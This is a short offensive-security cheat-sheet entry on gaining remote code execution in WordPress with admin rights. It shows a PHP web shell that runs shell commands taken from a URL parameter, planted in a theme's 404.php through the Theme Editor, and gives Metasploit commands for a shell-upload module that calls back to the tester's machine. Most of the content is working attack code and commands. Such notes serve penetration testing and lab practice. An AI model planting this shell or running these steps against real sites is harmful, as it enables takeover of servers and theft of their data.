WordPress Admin RCE
With sufficient privileges, it is possible to exploit a remote code execution (RCE) vulnerability on WordPress.
Since admins can modify templates, and templates are written in PHP, we can replace one of them with our code. For instance, a remote shell, meaning we would have a remote command execution (RCE).
Select Appearance then Theme Editor. Select a theme, preferably one that is not used to avoid breaking things.
Pick a non-critical file such as 404.php and add to it a web shell or directly use a reverse shell:
<?php
// add your webshell
echo "<pre>".shell_exec(($_GET['cmd'] ?? "whoami")." 2>&1")."</pre>";
// prevent the rest of the page from showing up
// β οΈ it may not work, remove it if it doesn't
exit 0;
To execute it, aside from accessing an invalid URL which may highlighted in the logs, directly access the file from the theme folder:
https://<HOST>/wp-content/themes/<theme_name>/404.php
Metasploit Module
You can use metasploit, but it's quite unreliable.
$ msfconsole -q
msf6> use wp_admin_shell_upload
msf6> set USERNAME username
msf6> set PASSWORD password
msf6> set RHOSTS IP
msf6> set LHOST tun0
msf6> run
Some options you might want to set:
msf6> set WPCHECK yes # may be false in some scenarios
msf6> set httptrace true
msf6> set TARGETURI /wordpress/
msf6> run